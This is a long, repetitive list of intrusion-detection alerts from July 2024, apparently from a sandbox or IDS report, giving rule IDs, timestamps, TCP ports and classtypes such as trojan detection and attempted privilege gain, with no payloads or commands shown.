                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.616747
                      SID:2027339
                      Source Port:59268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435096
                      SID:2835222
                      Source Port:40168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.096689
                      SID:2831300
                      Source Port:38582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.234951
                      SID:2025132
                      Source Port:57612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.161094
                      SID:2027339
                      Source Port:60344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.262546
                      SID:2025132
                      Source Port:50494
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2829579
                      Source Port:47408
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.331187
                      SID:2030490
                      Source Port:46914
                      Destination Port:2466
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.559320
                      SID:2027339
                      Source Port:53114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.754007
                      SID:2835222
                      Source Port:58036
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.510455
                      SID:2835222
                      Source Port:47694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.476168
                      SID:2027339
                      Source Port:53750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.210836
                      SID:2027339
                      Source Port:44162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.056582
                      SID:2835222
                      Source Port:51874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.961036
                      SID:2027339
                      Source Port:40880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.552004
                      SID:2831300
                      Source Port:47228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:45.468009
                      SID:2835222
                      Source Port:58118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.262795
                      SID:2027339
                      Source Port:44066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.694402
                      SID:2025132
                      Source Port:53588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.645434
                      SID:2025132
                      Source Port:47748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.468656
                      SID:2027339
                      Source Port:47314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.503773
                      SID:2027339
                      Source Port:39178
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.607832
                      SID:2027339
                      Source Port:41712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.534447
                      SID:2027339
                      Source Port:52994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.204459
                      SID:2027339
                      Source Port:33148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.447452
                      SID:2831300
                      Source Port:53768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.964001
                      SID:2027339
                      Source Port:35564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.164213
                      SID:2025132
                      Source Port:37484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:55.587260
                      SID:2027339
                      Source Port:43864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:23.120505
                      SID:2025132
                      Source Port:35166
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.477468
                      SID:2025132
                      Source Port:38822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:54.482380
                      SID:2027339
                      Source Port:40810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.549030
                      SID:2027339
                      Source Port:55700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2835222
                      Source Port:59422
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.381718
                      SID:2027339
                      Source Port:45780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.861759
                      SID:2835222
                      Source Port:56990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.035942
                      SID:2829579
                      Source Port:50158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.076298
                      SID:2025132
                      Source Port:52106
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2835222
                      Source Port:36302
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.136809
                      SID:2027339
                      Source Port:47060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.626162
                      SID:2025132
                      Source Port:41304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.610819
                      SID:2027339
                      Source Port:43790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.486069
                      SID:2027339
                      Source Port:50956
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.652423
                      SID:2835222
                      Source Port:54818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.136712
                      SID:2829579
                      Source Port:44554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.111365
                      SID:2027339
                      Source Port:54666
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.800738
                      SID:2027339
                      Source Port:32814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763322
                      SID:2829579
                      Source Port:49088
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.437928
                      SID:2025132
                      Source Port:42174
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.334659
                      SID:2027339
                      Source Port:34342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.002504
                      SID:2831300
                      Source Port:38118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.860812
                      SID:2025132
                      Source Port:39694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:29.433951
                      SID:2831300
                      Source Port:37660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.812092
                      SID:2831300
                      Source Port:34572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.554556
                      SID:2027339
                      Source Port:56388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.443569
                      SID:2027339
                      Source Port:39000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439166
                      SID:2829579
                      Source Port:40508
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.458817
                      SID:2831300
                      Source Port:57724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.575596
                      SID:2025132
                      Source Port:53664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2829579
                      Source Port:58774
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.032993
                      SID:2027339
                      Source Port:60994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.125044
                      SID:2027339
                      Source Port:40538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.537576
                      SID:2835222
                      Source Port:43450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.066315
                      SID:2831300
                      Source Port:52026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.107735
                      SID:2835222
                      Source Port:45968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2835222
                      Source Port:57990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.133659
                      SID:2831300
                      Source Port:45948
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:48.748554
                      SID:2829579
                      Source Port:47664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.852857
                      SID:2829579
                      Source Port:35626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.039093
                      SID:2835222
                      Source Port:47436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:08.490661
                      SID:2027339
                      Source Port:34084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.922584
                      SID:2027339
                      Source Port:48886
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.736310
                      SID:2025132
                      Source Port:49474
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.207184
                      SID:2027339
                      Source Port:60402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.640556
                      SID:2025132
                      Source Port:60402
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.834336
                      SID:2027339
                      Source Port:37212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.476247
                      SID:2835222
                      Source Port:51626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.199925
                      SID:2025132
                      Source Port:37980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.297548
                      SID:2025132
                      Source Port:49134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.805050
                      SID:2027339
                      Source Port:57122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.257816
                      SID:2835222
                      Source Port:48098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.369729
                      SID:2027339
                      Source Port:36532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.863826
                      SID:2829579
                      Source Port:40396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.233806
                      SID:2829579
                      Source Port:37478
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763323
                      SID:2829579
                      Source Port:53880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.580139
                      SID:2829579
                      Source Port:38174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.191070
                      SID:2025132
                      Source Port:41646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.906267
                      SID:2831300
                      Source Port:43942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.771763
                      SID:2027339
                      Source Port:54230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.023606
                      SID:2831300
                      Source Port:52700
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.353037
                      SID:2831300
                      Source Port:43942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.451363
                      SID:2831300
                      Source Port:37914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.822853
                      SID:2027339
                      Source Port:42418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.365777
                      SID:2027339
                      Source Port:54962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.700908
                      SID:2025132
                      Source Port:34802
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.425707
                      SID:2025132
                      Source Port:44530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2835222
                      Source Port:46170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.403626
                      SID:2025132
                      Source Port:51702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.454427
                      SID:2027339
                      Source Port:60172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2835222
                      Source Port:59844
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.478142
                      SID:2831300
                      Source Port:56552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.639265
                      SID:2027339
                      Source Port:45566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.777005
                      SID:2829579
                      Source Port:42476
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.413672
                      SID:2027339
                      Source Port:42676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.813206
                      SID:2027339
                      Source Port:49220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:30.542349
                      SID:2027339
                      Source Port:41762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.648653
                      SID:2027339
                      Source Port:57128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.304282
                      SID:2027339
                      Source Port:54356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.114018
                      SID:2027339
                      Source Port:58120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:03.190387
                      SID:2027339
                      Source Port:44998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.184596
                      SID:2025132
                      Source Port:55360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.445659
                      SID:2831300
                      Source Port:47622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2829579
                      Source Port:54852
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.102642
                      SID:2025132
                      Source Port:50986
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.124566
                      SID:2829579
                      Source Port:32814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830838
                      SID:2829579
                      Source Port:49388
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.239089
                      SID:2027339
                      Source Port:45714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.074396
                      SID:2027339
                      Source Port:41926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.549584
                      SID:2027339
                      Source Port:60564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.535629
                      SID:2025132
                      Source Port:43382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2835222
                      Source Port:44918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.459685
                      SID:2831300
                      Source Port:57738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:56.433850
                      SID:2831300
                      Source Port:53860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.351675
                      SID:2025132
                      Source Port:59062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.562825
                      SID:2831300
                      Source Port:41738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:52.775382
                      SID:2025132
                      Source Port:49872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.483885
                      SID:2831300
                      Source Port:53012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.209030
                      SID:2027339
                      Source Port:39984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763323
                      SID:2835222
                      Source Port:59256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2829579
                      Source Port:35728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.627950
                      SID:2835222
                      Source Port:54356
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.441297
                      SID:2027339
                      Source Port:37968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.354373
                      SID:2829579
                      Source Port:35112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.556915
                      SID:2027339
                      Source Port:37522
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.201235
                      SID:2831300
                      Source Port:34860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.139140
                      SID:2831300
                      Source Port:35348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245949
                      SID:2835222
                      Source Port:41378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.612058
                      SID:2027339
                      Source Port:54170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.267901
                      SID:2025132
                      Source Port:46356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.479091
                      SID:2829579
                      Source Port:50660
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.403626
                      SID:2025132
                      Source Port:43818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.741704
                      SID:2027339
                      Source Port:50472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.022416
                      SID:2027339
                      Source Port:56356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.517370
                      SID:2027339
                      Source Port:33262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.439088
                      SID:2831300
                      Source Port:37406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.427717
                      SID:2025132
                      Source Port:40836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.685490
                      SID:2025132
                      Source Port:47502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.718240
                      SID:2025132
                      Source Port:56550
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.137269
                      SID:2829579
                      Source Port:33124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.143736
                      SID:2831300
                      Source Port:46318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.641730
                      SID:2027339
                      Source Port:54424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.614585
                      SID:2027339
                      Source Port:39928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.712014
                      SID:2027339
                      Source Port:54164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.357082
                      SID:2835222
                      Source Port:52464
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.432404
                      SID:2027339
                      Source Port:40706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.482812
                      SID:2025132
                      Source Port:50740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.287494
                      SID:2025132
                      Source Port:55462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.438139
                      SID:2025132
                      Source Port:47762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.257590
                      SID:2027339
                      Source Port:34612
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.515632
                      SID:2027339
                      Source Port:45298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.027779
                      SID:2027339
                      Source Port:52926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.439166
                      SID:2829579
                      Source Port:36762
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.438205
                      SID:2027339
                      Source Port:47286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.564288
                      SID:2025132
                      Source Port:38838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:06.967288
                      SID:2831300
                      Source Port:60224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:34.302136
                      SID:2831300
                      Source Port:58994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:13.512424
                      SID:2831300
                      Source Port:39896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.055909
                      SID:2829579
                      Source Port:45640
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.721858
                      SID:2025132
                      Source Port:35604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.221707
                      SID:2027339
                      Source Port:51298
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.338978
                      SID:2831300
                      Source Port:37392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:34.302136
                      SID:2027339
                      Source Port:53642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.992160
                      SID:2027339
                      Source Port:39026
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.450049
                      SID:2831300
                      Source Port:54868
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.328788
                      SID:2025132
                      Source Port:54766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.483612
                      SID:2027339
                      Source Port:40576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.227561
                      SID:2025132
                      Source Port:55388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.106017
                      SID:2027339
                      Source Port:57574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.613195
                      SID:2027339
                      Source Port:54202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.089846
                      SID:2025132
                      Source Port:36156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
